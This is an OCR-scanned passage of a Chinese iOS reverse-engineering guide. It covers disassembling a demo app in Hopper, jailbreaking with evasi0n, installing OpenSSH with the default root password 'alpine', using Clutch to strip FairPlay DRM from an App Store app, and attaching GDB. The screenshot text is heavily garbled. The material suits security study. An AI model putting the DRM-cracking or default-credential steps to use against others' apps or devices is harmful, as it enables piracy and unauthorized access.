编译 运行 ， 使 用 SimPholders， 点 击 其 中 的 AlertDemo 













Recently used apps 
AlertDemo 1.0 4 


—+ + com.security.demostatic2.AlertD... 
-LPv 111KB 


fo 


|. SDKs 
LES > 
About 
v. Start at Login 
Check For Updates... 
Quit SimPholders 
会 打开 目录 中 选择 AlertDemo 右 键 ， 点 击 Show Package contents 


然后 用 Hopper 打 开 里 面 的 可 执行 文件 


iOS 安全 Wiki 


£3 EDFSACO7-8FBC-4C98-8C78-7B6532F998E2 
















6F51969-..99B5BAGF37 r E WEC 

















" a F 
F [3 Containers ^ [3 B8COT7EAE-...CGBF15D844 '- |) Documents a 
F [3 Documents ^ L3 940B3030-..2A1BOCS8ADE © |j Library F 
[3 Library * [3 2021F090-...0740E3678B © |) tmp 
(> Media - [3 5725D534-..057DA885C © 
L3 Root H L3 AE7CDB3O-..0EF778381bE ™ 
C3 tmp > [ 国 EDFSACO7-...6532F998E2 " 
[2 var P 





Mame AlertDemo 
Kind Application 
Size 111 KB 
Created Yesterday, 8:38 F 
Modified Yesterday, 8:39 F 
Last opened Yesterday, 8:39 F 
Version 1.0 


ij Disk + Go Users > f admin + [E Library + C Application + |. iPhone Sim - C] 7.1 - (> Application + (> EDFSACO7-8FBC-4C98-8C78-786532F998E2 + A 


可 以 看 到 ViewDidLoad 中 的 汇编 代码 如 下 : 

















De DL a ^ cr p S Vince ov He > 2 a L^ d 4 +.) MÀ = Tht 2: M o 
AlertDemo.hop e 
LS] Lee) (i) LID el) CR 
; endp 
=e -" 00001cle nop 
(c Q” Search ) 00001c1f nop 
> Tag Scope 
F BEGINNING OF PROCEDURE 
start 
-[ViewController viewDidLoad] 
“ViewController didRaceveMemoryWaming) -[ViewController viewDidLoad]: 
-[AppDelegate application:didFinishLaunchingWithOptions:] 
-[AppDelegate applicationWillResignActive:] 00001c21 mov ebp, esp 
-[AppDelegate applicationDidEnterBackground:] — Sas puan We 
Pee guara 00001c24 push edi 
-[AppDelegate applicationWillEnterForeground:] 00001c25 push esi 
-[AppDelegate applicationDidBecomeActive:] 00001c26 sub esp, Ox4c 
00001c29 call @xic2e 
-[AppDelegate applicationWillTerminate:] 00001c2e pop eax ; XREF= 
-[AppDelegate window] 0e0001c2f mov ecx, dword pilos euro -oTit 
E : 00001c32 mov edx, dword [ss:ebp-0x58«arg, offset x6 
VAppoelegne setindow] 00001c35 mov esi, 0x0 
-AppDelegate .cxx destruct] 00001c3a lea edi, dword [ss:ebp-0x58«var. 52] 
.main 00001c3d lea ebx, dword [ds:eax-@xic2e+cfstring_Welcome] ; Q"Wel 
UlApplicationMain 00001c43 mov dword [ss:ebp-0x58* PIC register ], eax 
00001c46 lea eax, dword [ds:eax-@xlc2e+cfstring_Welcome_to_your_i0S Device Ted ] ; 
NSStringFromClass 00001c4c mov dword [ss:ebp-0x58«var 44], eax 
objc autoreleasePoolPop 00001c4f pe eax, dword ne TO ioler] à; 
00001c52 ea eax, dword [ds:eax-O0x1lc2e«cfstring security ios wiki com ; @"sec 
obj AutoreleasePool Push 0e0001c58 mov dword [ss:ebp-0x58«var 40], eax i 
objc msgSend 00001c5b lea eax, are ial Prete te 
objc_msgSendSuper2 80801c5e mov dword [ss:ebp-0x58*var 72], edx 
gums = 00001c61 mov dword [ss:ebp-0x58evar 68], ecx 
jc release 00001c64 mov ecx, dword [ss:ebp-0x58-var. 72] 
objc retainAutoreleasedReturnValue 00001c67 mov dword [ss:ebp-0x58*var 56], ecx 
objc storeStrong 00001c6a mov ecx, dword [ss:ebp-0x58« PIC register ] 
00001cé6éd mov edx, dword [ds:ecx-0x1c2e«0x3570] 
ex 00001c73 mov dword [ss:ebp-0x58*var 60], edx 
_pvars 00001c76 mov edx, on grep ; Gsele 
dyld. stub. binder 00001c7c mov dword ss:esp], eax 
UlApplicationMain } v 一 Inns ns = dword [ss:esp*0x4], edx —.— LU ts 
> analysis section — cfstring 
NSStringFromClass > analysis section — objc_ivar 
objc autoreleasePoolPop > analysis section — data 
objc autoreleasePoolPush > analysis section ' common 
^ Analysis segment __ LINKEDIT 
objc msgSen Analysis segment External Symbols 
objc msgSendSuper2 Background analysis ended 


点 击 右上 角 箭 头 所 指 的 图 标 ， 得 到 如 下 的 伪 代 码 : 
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e 
E 
3) 
m 
i 


per ler v il it Debug Scripts Window elp a | OI: | Th : 1 1 
加 日 日 AlertDemo.hop 


Le) [& J (55) (D. C.) 





fere] ; endp 
Strings | 00001c1d hlt 
E REM 98091cle nop 
Q~ Search 00001c1f nop 
> Tag Scope 
start 
-[ViewController viewDidLoad] 


-[ViewController didReceiveMemoryWarning] 


-[ViewController viewDidLoad]: 
-[AppDelegate application:didFinishLaunchingWithOptions:] push ebp 


ANNN1 ~ 


-[AppDelegate applicationWillResignActive:] eoo Pseudo Codes ob 
-[AppDelegate applicationDidEnterBackground:] function -[ViewController viewDidLoad] 1 
-[AppDelegate applicationWillEnterForeground:] .PIC register  - eax; 
-[AppDelegate applicationDidBecomeActive:] va E z ynia to your u Dev ice Ted!"; 
r = r . TW „com ; 

-[AppDelegate applicationWillTerminate:] s r-72 fact dit 1Ki.COm j ; XREF- 
-[AppDelegate window] var 68 - arg offset x4; fset x4] 
-[AppDelegate setWindow:] var_56 = var.72; ` fset x0] 
-[AppDelegate .cxx destruct] var 60 = *x0x3570; ] 
.main va r-32 = en a ; ange lconel ; @"Wel 
PROT Us r 28 - is m à | | Eine econ tu-són r_i0S Device Ted ] ; 
objc autoreleasePoolPop E sida js ee ved n h un rs 
objc autoreleasePoolPush var 52 - objc msgSend(eax, *0x3558); EISE te HEN UE ; qe 
objc msgSend [var 52 show]; ] 
objc_msgSendSuper2 eax = objc storeStrong(var 32, 0x0); Kk 

return eax; K 
objc release ) ] 
objc retainAutoreleasedReturnValue | X 
objc storeStrong egister_] 
exit e 
-pvars 50] ; Gsele 


dyld stub binder 
UlApplicationMain 
NSStringFromClass 

objc autoreleasePoolPop 
objc autoreleasePoolPush 
objc msgSend 


objc msgSendSuper 2 TUS OauwgrUurmu RT RY erem 一 
Address Q0x1c20. Seament TEXT. -IViewContraller viewDidl nadl + A. Section text. file offset nxc20 


可 以 看 到 ， 用 Hopper 能 够 得 到 近似 源码 的 伪 代 码 。 








function -[ViewController viewDidLoad] { 
PIC register = eax; 
var 44 = @"Welcome to your iOS Device Ted!"; 
var 40 = Q'"security.ios-wiki.com"; 
var 72 - arg offset x0; 
var. 68 - arg offset x4; 
var 56 = var 72; 
var 60 = *0x3570; 
var 36 - Q"Welcome"; 
var 32 - &var 52; 
var 28 = 0x0; 
[[&var. 56 super] viewDidLoad]; 
eax = [UIAlertView alloc]; 
var_52 = objc_msgSend(eax, *0x3558); 
[var_52 show]; 
eax = objc_storeStrong(var_32, 0x0); 
return eax; 


小 结 


可 以 看 到 ，Hopper 功 能 相当 强大 ， 它 还 有 更 多 功能 ， 欢 迎 读者 亲自 去 尝试 下 ， 去 买 一 个 正 
版 ， 价 格 也 比 IDA 便 宜 得 多 。 


#3 Mac 上 需要 安装 的 工具 下 的 更 多 文章 


3.8 Hopper: 另 一 款 反 汇编 工具 67 


本 章 介 绍 了 iOS 逆 向 工程 过 程 中 ， 需 要 在 Mac 上 安装 的 工具 ， 并 且 对 其 用 法 进行 了 简要 的 介 


绍 ， 下 一 草 将 介绍 需要 在 iDS 设 备 上 安装 的 工具 ， 然 后 我 们 就 可 以 正式 开始 iDOS 逆 向 工程 之 旅 
了 s 


#3 Mac 上 需要 安装 的 工具 下 的 更 多 文章 


iOS 设 备 上 的 工具 


本 节 将 简要 介绍 iDS 设 备 越狱 的 步骤 


越狱 你 的 设备 


如 果 你 丨 的 对 iOS 安 全 很 感 兴 趣 ， 有 一 个 越狱 设备 是 非常 有 必要 的 。 在 本 节 ， 我 们 将 介绍 如 何 
越狱 iDS 设 备 。 越 狱 之 后 有 很 多 好 处 ， 你 可 以 安装 很 多 工具 ， 例 如 nmap, metasploit， 甚 至 在 
设备 上 运行 自己 写 的 python 代 码 。 


越狱 非常 简单 ， 下 载 一 个 越狱 软件 ， 然 后 点 击 越狱 就 可 以 了 。 如 果 你 的 设备 运行 的 是 iDOS 6.x 
到 iOS 7.0.6 的 系统 ， 推 着 你 使 用 evasi0n， 如 果 你 的 设备 运行 的 是 IOS 5.x > AB AEG 
A redsnOw 。 


A ATIOS 7.1 到 iOS 7.1.1 已 经 能 越狱 ， 但 是 越狱 方法 还 没有 公布 出 来 ， 应 该 要 iOS 8 发 布 之 
Ja 9 才 会 公布 o 


请 注意 ， 在 越狱 之 前 ， 一 定 要 先 用 iTunes 或 者 iCloud 备 份 一 下 ， 这 样 即使 出 错 ， 你 也 能 够 恢复 
你 的 数据 。 


请 注意 : 以 下 越狱 部 分 的 介绍 来 目 这 里 


本 文 将 对 我 的 new iPad (3 代 ， 运 行 iOS 6.0.1) 越狱 。 一 旦 你 下 载 evasi0n 并 运行 ， 它 就 会 自 
动 检测 设备 并 且 告 诉 你 这 个 设备 是 否 可 以 越狱 。 如 图 : 


eoo evasi0n - Version 1.5 


Welcome! evasiOn is an untethered jailbreak for iOS 6.0 through 6.1.2. 


iPad 3 (CDMA) (iOS 6.0.1) is supported. Click Jailbreak to begin. 






































NOTE: Please make a backup of your device before applying the jailbreak. 
We dont think there will be any problems, but we can? make any guarantees. 
Use evasiün at your own risk. 


evasiün © 2013 @evad3rs 
jailbreak exploits by @planetbeing and @pimskeks. 
graphic design by @Surenix - interface by Hanéne Samara. 


Support Us (PayPal) http:/ /evasiün.com 


你 需要 做 的 仅仅 是 点 击 jailbeak( 越 狱 )， 然 后 让 evasi0n 做 剩 下 的 事情 


Li. OD evasiOn - Version 1.5 


Welcome! evasiOn is an untethered jailbreak for iOS 6.0 through 6.1.2. 


Retrieving information from the device to generate jailbreak data... 


pem | | ro 
Sr CL _Jaiibreak 





















































NOTE: Please make a backup of your device before applying the jailbreak. 
We dont think there will be any problems, but we cant make any guarantees. 
Use evasiün at your own risk. 


evasi0n © 2013 @evad3rs 
jailbreak exploits by @planetbeing and @pimskeks. 
graphic design by @Surenix - interface by Hanéne Samara. 


Support Us (PayPal) http: / /evasiün.com 





你 可 以 看 和 到， 越狱 已 经 开始 了 。 过 一 段 时 间 之 后 > evasi0n 将 会 重启 设备 ， 然 后 运行 


.9 o O — - UÓ— l 5 


Welcome! evasiOn is an untethered jailbreak for iOS 6.0 through 6.1.2. 


Injecting stage 2 jailbreak data (step 2/3)... (Do not touch your device) 


Jailbreak 
























































NOTE: Please make a backup of your device before applying the jailbreak. 
We dont think there will be any problems, but we cant make any guarantees. 
Use evasiün at your own risk. 


evasiün © 2013 mevad3rs 
jailbreak exploits by @planetbeing and @pimskeks. 
graphic design by @Surenix - interface by Hanéne Samara. 


Support Us (PayPal) http:/ /evasiün.com 
exploit (利用 程序 ) 。 


一 旦 利用 程序 (exploit) 运行 完毕 ， 它 就 会 安装 Cydia 和 Cydia 的 包 列 表 到 设备 上 。Cydia 是 一 
个 图 形 界 面 ， 使 得 你 能 在 越狱 设备 上 下 载 和 安装 软件 包 和 应 用 ， 这 些 应 用 通 第 你 在 App store 
是 找 不 到 的 。 基 本 上 所 有 的 越狱 程序 都 会 默认 安装 Cydia。 你 可 以 认为 Cydia 就 是 越狱 设备 上 
的 App Store。 


eoo evasiün = u— 1.5 


Welcome! evasiOn is an untethered jailbreak for iOS 6.0 through 6.1.2. 


Uploading Cydia packages list... (Do not touch your device) 


NOTE: Please make a backup of your device before applying the jailbreak. 
We dont think there will be any problems, but we cant make any guarantees. 
Use evasiün at your own risk. 


evasi0n © 2013 @evad3rs 
jailbreak exploits by @planetbeing and @pimskeks. 
graphic design by @Surenix - interface by Hanéne Samara. 


Support Us (PayPal) http://evasiün.com 





等 待 一 段 时 间 ， 直 到 你 得 到 下 面 的 提示 。 


eoo evasiOn - Version 1.5 
Welcome! evasiOn is an untethered jailbreak for iOS 6.0 through 6.1.2. 


To continue, please unlock your device and tap the new ‘Jailbreak’ icon. Only 
tap it once! The screen will go black and then return to the home screen. 


c mE — 53 | Jailbreak 


NOTE: Please make a backup of your device before applying the jailbreak. 
We dont think there will be any problems, but we cant make any guarantees. 
Use evasiün at your own risk. 


evasiün © 2013 (Gevad3rs 
jailbreak exploits by @planetbeing and @pimskeks. 
graphic design by @Surenix - interface by Hanéne Samara. 


Support Us (PayPal) http:/ /evasiün.com 





解锁 你 的 设备 ， 你 可 以 看 到 桌面 上 有 个 新 的 app 图 标 ， 叫 做 Jailbreak。 点 击 它 以 完成 越狱 过 


程 。 


iOS 24 Wiki 


EXTREME 


Extreme World 


pile 


= 2) y - 





EMI :可 Settings 


你 可 以 看 到 你 的 设备 将 会 重启 。 请 耐心 等 待 这 个 过 程 的 完成 。 一 旦 设备 完成 重启 ， 你 可 以 看 
到 一 个 叫做 Cydia 的 新 app 在 划 面 上 。 这 个 就 表明 你 已 经 成 功 越 狱 。 


祝贺 你 ， 你 已 经 在 iOS hacking 领 域 跨 出 了 第 一 步 。 
小 结 


本 文 简 要 介绍 了 如 何 对 iOS 设 备 越狱 ， 并 且 以 jiOS 6 为 例 ， 我 手头 没有 可 以 越狱 的 iDS 7 设备 ， 
因此 ， 这 里 没有 介绍 ， 步 骤 其 实 也 类 似 。 后 续 iDS7.1.1 可 以 越狱 了 ， 这 里 再 更 新 下 教程 。 


越狱 需 说 收 ， 请 一 定 备 份 数 据 。 


对 于 普通 用 户 ， 从 安全 的 角度 考虑 ， 建 议 不 要 越狱 。 


#4 iOS 设 备 上 的 工具 下 的 更 多 文章 


4.1 iOS3X d XJ r3 


上 一 节 我 们 介绍 了 如 何 对 iDOS 设 备 越 狱 。 现在 你 已 经 完成 了 设备 的 越狱 ， 那 么 下 一 步 就 是 安 
装 一 些 重要 的 命令 行 工具 ， 例 如 wget, ps, apt-get 等 用 来 审计 iOS 应 用 的 工具 。 第 一 个 要 安装 
的 就 是 DpenSSH。 安 装 这 个 工具 可 以 让 你 从 mac 和 登录 进 越狱 设备 。 


(请 注意 ， 以 下 文字 来 自我 之 阐 翻 译 的 文章 ， 原 作者 是 : Prateek Gianchandani) 


进入 Cydia， 点 击 底 部 的 搜索 tab， 然 后 搜索 : OpenSSH. 


100% -E ; 





4 OpenSSH 
“ia from Cydia/Telesphoreo (Networking) 
secure remote access between machines 


C3 sshpass 
a from BigBoss (Utilities) 


Provide non-interactive password access... 








Search 





A m OpenSSH : AG ABER ? 


alll Airtel ^ 3:39 PIV 100% EF 


| Install 








OpenSSH 
6.1p1-11 





P 


M Change Package Settings ? 


















































/ This is a console package! > | 



































Description 





secure remote access between 


machines 


OpenSSH Access How-To > 











Security Warning 





E you install OpenSSH, you need to 


change your device's root password 

to prevent the possibility of unsavory 
people remotely logging into your 
device using the default password. 








Changes WELET [= Search 


然后 OpenSSH 就 会 安装 在 你 的 设备 上 。 在 我 们 用 ssh 登 录 进 设备 之 前 ， 我 们 还 需要 安装 其 他 
一 些 命令 行 工 具 。 几 乎 所 有 流行 的 黑客 工具 都 可 以 在 BigBoss Recommendation tools 这 个 包 
中 找到 。 安 装 BigBoss Recommendation tools， 在 Cydia 中 搜索 ， 然 后 点 击 安 装 。 


100% -E ， 





Install - 


BigBoss Recommended ... 
iren 





“~” Change Package Settings > 


» Author BigBoss > | 


Combined list of hacker tools. Cydia no — 
longer comes preinstalled with most 
useful command line apps. This : 
package installs most the missing ones | 
in one swoop. There is no real package — 
provided here. It is only a set of 
depends on other various tools so that 
your command line can become useful 
again. 


Package Details 


ID bigbosshackertools 





Cydia sections Changes WEE Te [= Search 


有 些 重要 的 命令 行 工 具 例 如 : APT 0.6 Transitional, Git, GNU Debugger, less, make, unzip, 
wget 和 SQLite 3.x 会 被 安装 好 。 


还 有 一 个 工具 需要 被 安装 : MobileTerminal， 它 能 够 让 你 在 设备 上 直接 运行 命令 行 ， 而 不 是 需 


要 通过 Ssh 登 录 设 备 运行 命令 。 


在 Cydia 上 搜索 MobileTerminal, 然 后 安装 。 


uil. Airtel ^ E IV 100% -E ; 


"Search | Details Install 








MobileTerminal 
520-2 
C. Change Package Settings > 


» Author MobileTerminal 5 


Samsung GALAXY 2 ll 


esigned for hu jan. Soi "ec Dy nature 





Search 


— €. 4 & 4f MobileTerminal, R 3t T VA 4E x da Eg $| — 4-31 Napp E te > 4 F f Terminal. 


i Airtel = :59 P 100% -E ， 


e € 
| | 


Ibiscovr TAGS Harvest Xm 


' SBSettings ` 

















Gs 


Fede | 

Lm" SY 
ELAT ~= 
c— 2 


rer S Temple Run 











— à a " — s 
WobiPay VISUPAY ^ AVCam HelloPython 





Phone Camera Ë 


4.2 搭建 移动 渗透 测试 平台 


和 到 一 个 终端 试 试 运行 几 个 Unix 命 令 。 在 这 里 ， 我 们 简单 的 用 ps 列举 下 正 


Prateeks-iPhone:~- mobiles ps 
PID TTY TIME CMD 
8884 ttys000 0:00.03 -sh 
8893 ttys000 0:00.01 ps 


8883 ttys001 0:00.02 -sh 
Prateeks-1Phone:- mobiles 





QlwlEIRITIYIuU !|O]P. 
"ud Cae 


noona uU 





你 可 以 看 到 ，ps 这 个 命令 成 功 执行 。 


LE Ail ou Mey cur ^m 3 TAE 
—— e 
xj Ze 9 > > Xp yt : 、 、 A = 
找到 越狱 设备 的 |P 地 址 。 为 了 找到 设备 的 IP 地 址 ， 到 设置 (setti ) 
设备 现在 连接 的 网 络 。 ings) - WiFi 中 选择 


iOS 4 Wiki 



































IP Address 


Static 





IP Address 192.168.2.3 
Subnet Mask 255.255.255.0 | 
Router 192 168 2 i 
DNS 192.168.2.1 


Search Domains 


Client ID 





4.2 搭建 移动 渗透 测试 平台 





8/ 


可 以 看 到 ，IP 地 址 是 192.168.2.3。 让 我 们 试 试 以 root 用 户 o 在 命令 行 中 运行 如 下 命 
令 。root 的 默认 密码 是 : alpine。 推 荐 的 做 法 是 : 一 旦 你 安装 好 了 OpenSSH, 马上 改 掉 root 的 
leper emt 
码 ， 和 | 在 命令 行 输入 passwd 这 个 命令 ， 然 后 输入 2 次 新 密码 。 然 后 你 的 root 
秘密 就 已 修改 了 。 这 一 系列 命令 可 以 参见 下 图 : 





Prateeks-iPhone:- root# ssh root81982.1658.2.3 

The authenticity of host '182.15B8.2.3 (192.168.2.3]' can't be established. 
RSA key fingerprint is 53:ad:b5:c8:2T:82:5e:bb:4c: Ta: BB: 6T: T7: BB: de: 3c. 
Are you sure you want to continue connecting (yes/no)? yes 

Warning: Permanently added '192.168.2.3' (RSA) to the list of known hosts. 
roota182.158.2.3's password: 

Prateeks-iPhone:- root# passwd 

Changing password Tor root. 

New password: 

Retype new password: 

Prateeks-iPhone:- root# [] 


: 确保 在 运行 时 ，Cydia 在 后 全 运行 而 不 是 在 前 台 。 这 是 因为 Cydia 以 root 运 行 ， 因 此 ， 如 
cm 合 ， 而 此 时 我 们 nae 程 ， 而 恰好 此 时 该 进程 被 Cydia lock > PARA 
会 运行 成 功 。 


一 下 apt-get update, 获得 最 新 的 包 列 表 





Prateeks-iPhone:~ root# apt-get update 

Ign http://repo666.ultrasn@w.com ./ Release.agpa 

Get:1 http://apt.saurik.com ios/793.00 Release.gpa [189B] 

Ian http://cydia.iphonecake.com ./ Release.apa 

Hit http://apt.thebigboss.org stable Release.gpg 

Get:2 http://cydia.zodttd.com stable Release.gpga [1898] 

Get:3 http://apt.saurik.com ios/793.00 Release [622B] 

Hit http://repo666.ultrasn0w.com ./ Release 

Get:4 http://apt.modmyi.com stable Release.apg [189B] 

Hit http://cydia.iphonecake.com ./ Release 

Hit http://apt.thebigboss.org stable Release 

Ign http://cydia.xsellize.com ./ Release.gpg 

Ign http://apt.saurik.com ios/793.00/main Packages/DifflIndex 

Ign http://repo666.ultrasn@w.com ./ Packages/DiffIndex 

Get:5 http://cydia.zodttd.com stable Release [1619B] 

Get:6 http://apt.modmyi.com stable Release [1341B] 

Hit http://cydia.xsellize.com ./ Release 

Get:7 http://apt.saurik.com ios/793.00/main Packages [24.0kB] 

Ign http://cydia.iphonecake.com ./ Packages/DiffiIndex 

Hit http://repo666.ultrasn0w.com ./ Packages 

Hit http://apt.thebigboss.org stable/main Packages/DiffIndex 

Ign http://cydia.xsellize.com ./ Packages/DiffIndex 

Get:8 http://apt.modmyi.com stable/main Packages/Difflndex [53.3kB] 

Hit http://cydia.iphonecake.com ./ Packages 

Get:9 http://cydia.zodttd.com stable/main Packages/Difflndex [53.0kB] 

Get:10 http://cydia.xsellize.com ./ Packages [432kB] 

Get:11 http://apt.thebigboss.org stable/main Packages [1043kB] 

Get:12 http://cydia.zodttd.com stable/main 2013-02-21-2100.40«2013-03-02-2200.39.pdiff [13.9kB] 
Get:13 http://apt.modmyi.com stable/main 2013-02-21-1943.2742013-03-03-0409.41.pdiff [65.0kB] 
Get:14 http://cydia.zodttd.com stable/main 2013-02-21-2100.4042013-03-02-2200.39.pdiff [13.9kB] 
Get:15 http://cydia.zodttd.com stable/main 2013-02-21-2100.40«2013-03-02-2200.39.pdiff [13.9kB] 
Get:16 http://apt.modmyi.com stable/main 2013-02-21-1943.2742013-03-03-0409.41.pdiff [65.0kB] 
60% [15 Packages rred 0B] [11 Packages 749kB/1043kB 71%] [10 Packages 87.2kB/432kB 20%] 
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[+1] > A&iPhone.E ig £& —4-3& X > ikeefi] A T Ri 2525 ^ AKE WM ikeet) TÉ 2a > VT d 
4 : An Analysis of the iKeeB (duh) iPhone botnet (Worm) 


#4 iOS 设 备 上 的 工具 下 的 更 多 文章 


如 果 你 直接 从 iOS 设 备 上 导出 从 App Store 下 载 的 应 用 的 IPA 色 


App Store 上 的 应 用 都 使 用 了 FairPlay DRM 数 字 版 权 加 密 保 


， 你 会 发 现 其 内 容 


护 技 术 。 


我 们 要 对 文件 进行 反 汇 编 ， 而 IPA 都 是 加 密 的 ， 哪 怎么 办 呢 ? 


可 以 使 用 Clutch 工 具 。 


不 管 应 用 如 何 加 密 ， 在 其 运行 的 时 候 ， 它 总 要 解密 ， 所 以 ， 
行 时 的 内 存 数 据 按 照 一 定格 式 导 出 。 


Clutch 开 源 ， 代 码 在 这 里 ， 你 也 可 以 直接 下 载 它 的 Release 


下 载 Clutch 之 后 ， 利 用 前 面 介 绍 的 iFunbox 等 


的 /usr/bin 目 录 下 。 


然后 ， 在 Mac 上 打开 命令 行 ， 输 入 命令 : 


ssh root0192.168.0.101 


然后 输入 秘密 ， 就 可 以 连 上 你 的 iOS 设 备 了 。 越 狱 之 后 ， 默 


请 在 登录 进去 之 后 ， 输 入 命令 passwd 更 改 。 
AB: 
© 00 ^* admin — ssh — 80x24 


Last login: Fri May 30 06:56:00 on console 
ZPs-MBP:^ admin$ ssh root@192.168.0.101 
root@192.168.0.101's password: 
Tedteki-iPad:^ root# ls /usr/bin/ 

2htmle git-mailinfo@ 
2xmL* git-mailsplit@ 

7 z* git-mergex 

7zax git-merge-baseQ 
Clutchx git-merge-file@ 
TQServer git-merge-index* 


[* git-merge-octopusx 
git-merge-one-filex 


addr2linex 
appsearchx 
apr-1-config* 
apt-cachex 
apt-cdrom:x 
apt-config*x 

i apt-extracttemplatesx 
apt-ftparchivex 
apt-getx 
apt-key:x 
apt-markx 
apt-sortpkgs* 

i apu-1-configx 


git-merge-ours@ 
git-merge-recursive@ 
git-merge-resolvex 
git-merge-stupidx 
git-merge-subtree@ 
git-merge-treex 
git-mergetoolx 
git-mktagx 
git-mktreex 
git-mv@ 
git-name-rev@ 
git-pack-objects@ 


请 注意 ， 上 面 的 ip 应 该 替换 成 你 的 iDS 设 备 的 IP。 


有 具 把 这 个 文件 拷贝 到 越狱 之 后 


Clutch 等 破解 工具 


不 f 


U $5 alpine » 


nm 

nmed1it* 
nohup* 
notificationWatcher* 
notify_post* 
nproc* 

obj copy: 

ob jdump:k 

odx 

openURL* 
opensslx 
otoolx 
otool64x 
pagesizex 
pagestuf fx 
passwdx 
pastex 
patchx 
patchsyncx 
pathchkx 


的 iDOS 设 备 上 


， 就 是 把 应 用 运 





在 命令 行 中 输入 Clutch 看 看 ， 如 下 图 : 


Tedteki-iPad:- root£ Clutch 


Clutch-1.3.1 

usage: Clutch [flags] [application name] [...] 

Applications available: 2048 Airbnb \ AmazonCN 
' brand5 Br buykee4Ipad | | CLash of CLans 





选择 你 要 破解 的 应 用 的 名 称 ， 这 里 的 名 称 是 上 图 中 输入 Clutch 之 后 显示 那些 名 称 。 


比如 : 


Clutch Airbnb 


如 下 图 所 示 : 


Tedteki-iPad:~ rcot# Clutch Airbnb 
Clutch-1.3.1 


Cracking Airbnb... 

Creating working directory... 

Performing initial analysis... 

Performing cracking preflight... 

Application is a thin binary, cracking single architecture... 

dumping binary: analyzing load commands 

dumping binary: obtaining ptrace handle 

dumping binary: forking to begin tracing 

dumping binary: obtaining mach port 

dumping binary: preparing code resign 

dumping binary: preparing to dump 

dumping binary: ASLR enabled, identifying dump location dynamically 

dumping binary: performing dump 

dumping binary: patched cryptid 

dumping binary: writing new checksum 

Censoring iTunesMetadata.pLlist... 

Packaging IPA file... 

compression level: @ 
/var/root/Documents/Cracked/Airbnb-v2.6.3-(Clutch-1.3.1).ipa 





elapsed time: 13073ms 


1 K«1—1Padi«^ DOTA 


可 以 看 到 ， 成 功 破解 应 用 ， 你 可 以 把 这 个 破解 后 的 文件 从 iDOS 设 备 上 拷贝 到 你 的 Mac 上 做 后 续 
的 分 析 了 。 


本 文 简要 介绍 了 Clutch 的 作用 和 用 法 ， 利 用 Clutch 可 以 很 方便 的 破解 应 用 。 
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#4 iOS 设 备 上 的 工具 下 的 更 多 文章 


4.3 Clutch : iOS 应 用 破解 工具 


91 


所 有 发 布 的 OS 设备 都 是 基于 ARM 架 构 的 。 我 们 开发 IOS 应 用 的 时 候 编写 的 Objective-C 代 码 会 
首先 转换 成 ARM 汇 编 ， ee § 令 。 对 ARM 汇 编 语 言 和 使 用 GDB 调 试 有 很 好 掌握 的 
话 ， 攻 击 者 是 能 够 在 运行 时 解密 Objective-C 代 码 其 至 修改 代码 的 。 

TA 


ARTT 4813€ Y https://code.google.com/p/apiexplorer/downloads/detail?name-gdb-1821.deb 
下 载 到 你 的 Mac 上 ， 然 后 使 用 iFunbox 找 贝 到 你 越狱 之 后 的 iDS 设 备 上 。 


然后 SSH 进 iDOS 人 设备 : 


e OO ^" admin — ssh — 80x24 


Last login: Fri May 30 19:18:42 on ttys002 
ZPs-MBP:^ admin$ ssh root@192.168.@0.101 





root@192.168.@.101's password: 
转 到 gdb-1821.deb 所 在 的 文件 夹 ， 然 后 执行 : 


dpkg -i gdb-1821.deb 


如 图 : 


Tedteki-iPad:/ root# dpkg -i gdb-1821.deb 
(Reading database ... 3404 files and directories currently installed.) 
Preparing to replace gdb 1821 (using gdb-1821.deb) ... 


Unpacking replacement gdb ... 
Setting up gdb (1821) ... 
» Tedteki-iPad:/ root# [] 





用 法 简介 


请 注意 ， 请 先 点 击 要 分 析 的 App， 使 得 App 处 于 运行 。 然 后 在 命令 行 输入 命令 : 
ps aux 


可 以 得 到 正在 运行 的 App 的 pid 等 信息 。 你 也 可 以 过 滤 出 你 想 要 的 信息 ， 比 如 : 


ps aux | grep 'Momo' 


可 以 得 到 你 要 分 析 的 应 用 (如 Momo ) 的 pid ”如 下 图 所 示 : 


J rau: / boti ps aux | grep 'Momo' 
5413 |. 0.6 2.7 401204 2/1/22 7? Ss 8:25AM 6:03.48 /var/mobile/Applications/EC3F08F0-E781-4EDF-8FEB-3277C369CFBC/MomoChat . app/MomoC 


5423 0.0 0.0 273024 404 s000 R+ 8:26AM — 0:00.00 grep Momo 
Tedteki-iPad:/ root# 





然后 输入 : 


gdb --pid 5413 (你 的 pid 可 能 跟 这 不 同 ， 请 注意 替换 ) 


这 样 你 就 挂 钧 进 App 了 。 一 旦 GDB 挂 钧 进 了 这 个 应 用 ， 你 会 注意 到 这 个 应 用 目前 是 在 暂 俘 状 
态 。 你 可 以 用 c 命令 让 这 个 应 用 继续 执行 ， 的 


(gdl) c 
Continuing. 





不 过 在 继续 执行 之 前 ， 让 我 们 先 做 些 调查 。 和 任何 其 它 架 构 一 样 ，ARM 中 的 内 存 也 被 分 为 寄 
存 器 〈register) 。 所 有 的 寄存 器 都 是 32 位 的 〈iOS 7 中 是 64 位 的 ) ， 并 且 它 们 的 目的 就 是 保 
存 数据 。 你 可 以 使 用 info registers 命 令 来 查看 关于 这 些 寄 存 器 的 信息 。 


suSDeEnNa COUNT: WW. 
(gdb) info registers 
re 0x10004005 266451845 
ri 0x7000006 117440518 
: 0x0 0 
0xc00 3072 
0x1d03 7427 
Oxffffffff -1 
0x0 0 
0x2fdb6ea0 802909856 
0x0 0 
0x56600 353792 
OxTTTTTTTT -1 
0x0 0 
OxfTfffffel -31 
0x2fdb6e60 802909792 
0x3a04004d 973340749 
0x3a03feb4 973340340 
i 


0x40000010, 


0x0, 
@x1, 
0x0, 
0x0, 
0x0, 
0x0, 
ge = Ox@, 
0x0, 
0x0, 
0x0, 
0x0, 
0x0, 
mode = 0x10 


n 


uH gu nu gy L 


toate oOo Ooo < ON 





请 注意 这 个 命令 并 没有 把 ARM 中 的 所 有 寄存 器 都 打印 出 来 。 要 打印 所 有 的 寄存 器 ， 使 用 info 
all-registers 命 令 。 


有 如 下 info 命 令 : 


(gdb) info 
"info" must be followed by the name of an info command. 


List 


info 
info 
| info 
info 
| info 
info 
info 
info 
info 
info 
info 
info 
info 
info 
info 
info 
info 
info 
info 
info 
info 
info 
info 
info 
info 
info 
info 
info 
info 


of info subcommands: 


address — Describe where symbol SYM is stored 

all-registers -- List of all registers and their contents 

args -- Argument variables of current stack frame 

auxv —- Display the inferior's auxiliary vector 

breakpoints — Status of user-settable breakpoints 

catch -- Exceptions that can be caught in the current stack frame 
checkpoints -- Help 

classes —- All Objective-C classes 

